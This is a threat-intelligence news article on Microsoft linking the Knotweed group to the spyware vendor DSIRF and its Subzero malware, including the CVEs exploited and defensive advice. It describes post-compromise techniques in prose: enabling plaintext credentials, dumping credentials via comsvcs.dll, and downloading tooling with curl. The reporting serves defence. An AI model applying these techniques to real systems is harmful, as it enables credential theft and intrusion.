Microsoft has linked a threat group known as Knotweed to an Austrian spyware vendor also operating as a cyber mercenary outfit named DSIRF that targets European and Central American entities using a malware toolset dubbed Subzero.
On its website, DSIRF promotes itself as a company that provides information research, forensics, and data-driven intelligence services to corporations.
However, it has been linked to the development of the Subzero malware that its customers can use to hack targets’ phones, computers, and network and internet-connected devices.
Using passive DNS data while investigating Knotweed attacks, threat intelligence firm RiskIQ also found that infrastructure actively serving malware since February 2020 linked to DSIRF, including its official website and domains likely used to debug and stage the Subzero malware.
The Microsoft Threat Intelligence Center (MSTIC) has also found multiple links between DSIRF and malicious tools used in Knotweed’s attacks.
“These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,” Microsoft said.
Some Knotweed attacks observed by Microsoft have targeted law firms, banks, and strategic consultancy organizations worldwide, including Austria, the United Kingdom, and Panama.
“As part of our investigation into the utility of this malware, Microsoft’s communications with a Subzero victim revealed that they had not commissioned any red teaming or penetration testing, and confirmed that it was unauthorized, malicious activity,” Microsoft added.
“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama.”
Subzero malware and zero-day exploits
On compromised devices, the attackers deployed Corelump, the primary payload that runs from memory to evade detection, and Jumplump, a heavily obfuscated malware loader that downloads and loads Corelump into memory.
The primary Subzero payload has many capabilities, including keylogging, capturing screenshots, exfiltrating data, and running remote shells and arbitrary plugins downloaded from its command-and-control server.
On systems where Knotweed deployed its malware, Microsoft has observed a variety of post-compromise actions, including:
- Setting of UseLogonCredential to “1” to enable plaintext credentials
- Credential dumping via comsvcs.dll
- Attempt to access emails with dumped credentials from a KNOTWEED IP address
- Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com
- Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF
Among the zero-days used in Knotweed campaigns, Microsoft highlights the recently patched CVE-2022-22047, which helped the attackers escalate privileges, escape sandboxes, and gain system-level code execution.
Last year, Knotweed also used an exploit chain made of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of them patched in June 2021.
In 2021, the cybermercenary group was also linked to the exploitation of a fourth zero-day, a Windows privilege escalation flaw in the Windows Update Medic Service (CVE-2021-36948) used to force the service to load an arbitrary signed DLL.
To defend against such attacks, Microsoft advises customers to:
- Prioritize patching of CVE-2022-22047.
- Confirm that Microsoft Defender Antivirus is updated to security intelligence update 1.371.503.0 or later to detect the related indicators.
- Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
- Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on.
- Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity.
- Review all authentication activity for remote access infrastructure, focusing on accounts configured with single-factor authentication, to confirm the authenticity and investigate any abnormal activity.
“To limit these attacks, we issued a software update to mitigate the use of vulnerabilities and published malware signatures that will protect Windows customers from exploits Knotweed was using to help deliver its malware,” said Cristin Goodwin, General Manager at Microsoft’s Digital Security Unit.
“We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms, where they are used to target human rights advocates, journalists, dissidents and others involved in civil society,” Goodwin added.